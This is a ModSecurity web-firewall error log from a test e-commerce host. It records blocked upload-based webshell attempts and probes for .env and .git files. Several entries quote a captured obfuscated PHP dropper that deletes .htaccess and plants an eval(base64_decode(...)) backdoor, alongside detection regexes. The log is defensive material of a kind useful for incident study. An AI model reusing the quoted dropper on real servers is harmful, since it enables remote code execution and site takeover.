[Wed Feb 11 14:46:43.173645 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.phar"] [unique_id "aYyIQ93qsyxqMqtCpbq8CQAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.173850 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.phar"] [unique_id "aYyIQ93qsyxqMqtCpbq8CQAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.538415 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: nv88364f428d25.php8 found within FILES:custom_attributes[country_id]: nv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYyIQ93qsyxqMqtCpbq8CgAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/v/nv88364f428d25.phar
[Wed Feb 11 14:46:43.539151 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYyIQ93qsyxqMqtCpbq8CgAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/v/nv88364f428d25.phar
[Wed Feb 11 14:46:43.539366 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYyIQ93qsyxqMqtCpbq8CgAAABA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/n/v/nv88364f428d25.phar
[Wed Feb 11 14:46:43.751721 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Rule 7f02f380ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.php8"] [unique_id "aYyIQ93qsyxqMqtCpbq8CwAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.752232 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.php8"] [unique_id "aYyIQ93qsyxqMqtCpbq8CwAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.754762 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.php8"] [unique_id "aYyIQ93qsyxqMqtCpbq8CwAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 14:46:43.755023 2026] [:error] [pid 2017453] [client 89.239.157.171:36386] [client 89.239.157.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/n/v/nv88364f428d25.php8"] [unique_id "aYyIQ93qsyxqMqtCpbq8CwAAABA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 11 16:09:42.082536 2026] [:error] [pid 2009513] [client 20.207.201.18:63157] [client 20.207.201.18] ModSecurity: Multipart parsing error: Multipart: Invalid Content-Disposition header (-11): form-data; name=file; filename=lufix.php; filename*=utf-8''lufix.php. [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aYybtli42lRnm_34jwCaiwAAAAE"]
[Wed Feb 11 23:18:41.268427 2026] [:error] [pid 2024136] [client 213.176.16.154:40572] [client 213.176.16.154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY0AQYhDSQZ_NY0dvwHHTQAAADg"]
[Wed Feb 11 23:18:41.268706 2026] [:error] [pid 2024136] [client 213.176.16.154:40572] [client 213.176.16.154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY0AQYhDSQZ_NY0dvwHHTQAAADg"]
[Wed Feb 11 23:18:41.268913 2026] [:error] [pid 2024136] [client 213.176.16.154:40572] [client 213.176.16.154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aY0AQYhDSQZ_NY0dvwHHTQAAADg"]
[Thu Feb 12 06:30:00.755736 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFAAAAAg"]
[Thu Feb 12 06:30:00.756778 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFAAAAAg"]
[Thu Feb 12 06:30:00.757020 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFAAAAAg"]
[Thu Feb 12 06:30:00.929790 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: radio.php found within FILES:file: radio.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFQAAAAg"]
[Thu Feb 12 06:30:00.929971 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFQAAAAg"]
[Thu Feb 12 06:30:00.930161 2026] [:error] [pid 2031976] [client 101.99.88.90:33212] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lWCKmEofWYUm0wUqpFQAAAAg"]
[Thu Feb 12 06:30:11.630558 2026] [:error] [pid 2030045] [client 101.99.88.90:56570] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: radio.php found within FILES:file: radio.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lY2eRfReAUHsiQgDVOAAAAAQ"]
[Thu Feb 12 06:30:11.630757 2026] [:error] [pid 2030045] [client 101.99.88.90:56570] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lY2eRfReAUHsiQgDVOAAAAAQ"]
[Thu Feb 12 06:30:11.630921 2026] [:error] [pid 2030045] [client 101.99.88.90:56570] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "aY1lY2eRfReAUHsiQgDVOAAAAAQ"]
[Thu Feb 12 07:55:47.525491 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Rule 7fef5ee33be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.phar"] [unique_id "aY15cyKmEofWYUm0wUqphgAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:47.526036 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.phar"] [unique_id "aY15cyKmEofWYUm0wUqphgAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:47.528541 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.phar"] [unique_id "aY15cyKmEofWYUm0wUqphgAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:47.528740 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.phar"] [unique_id "aY15cyKmEofWYUm0wUqphgAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:47.808811 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: me88364f428d25.php8 found within FILES:custom_attributes[country_id]: me88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY15cyKmEofWYUm0wUqphwAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/e/me88364f428d25.phar
[Thu Feb 12 07:55:47.809453 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY15cyKmEofWYUm0wUqphwAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/e/me88364f428d25.phar
[Thu Feb 12 07:55:47.809637 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aY15cyKmEofWYUm0wUqphwAAAAg"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/m/e/me88364f428d25.phar
[Thu Feb 12 07:55:47.998386 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Rule 7fef5ee33be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.php8"] [unique_id "aY15cyKmEofWYUm0wUqpiAAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:47.998863 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.php8"] [unique_id "aY15cyKmEofWYUm0wUqpiAAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:48.002741 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.php8"] [unique_id "aY15cyKmEofWYUm0wUqpiAAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 07:55:48.002935 2026] [:error] [pid 2031976] [client 176.195.127.156:33086] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/m/e/me88364f428d25.php8"] [unique_id "aY15cyKmEofWYUm0wUqpiAAAAAg"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 12 17:47:34.122138 2026] [:error] [pid 2042235] [client 185.93.89.110:59216] [client 185.93.89.110] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aY4EJtOf1_Ms1KEDe-xwXQAAADg"]
[Thu Feb 12 17:47:34.122507 2026] [:error] [pid 2042235] [client 185.93.89.110:59216] [client 185.93.89.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aY4EJtOf1_Ms1KEDe-xwXQAAADg"]
[Thu Feb 12 17:47:34.122699 2026] [:error] [pid 2042235] [client 185.93.89.110:59216] [client 185.93.89.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aY4EJtOf1_Ms1KEDe-xwXQAAADg"]
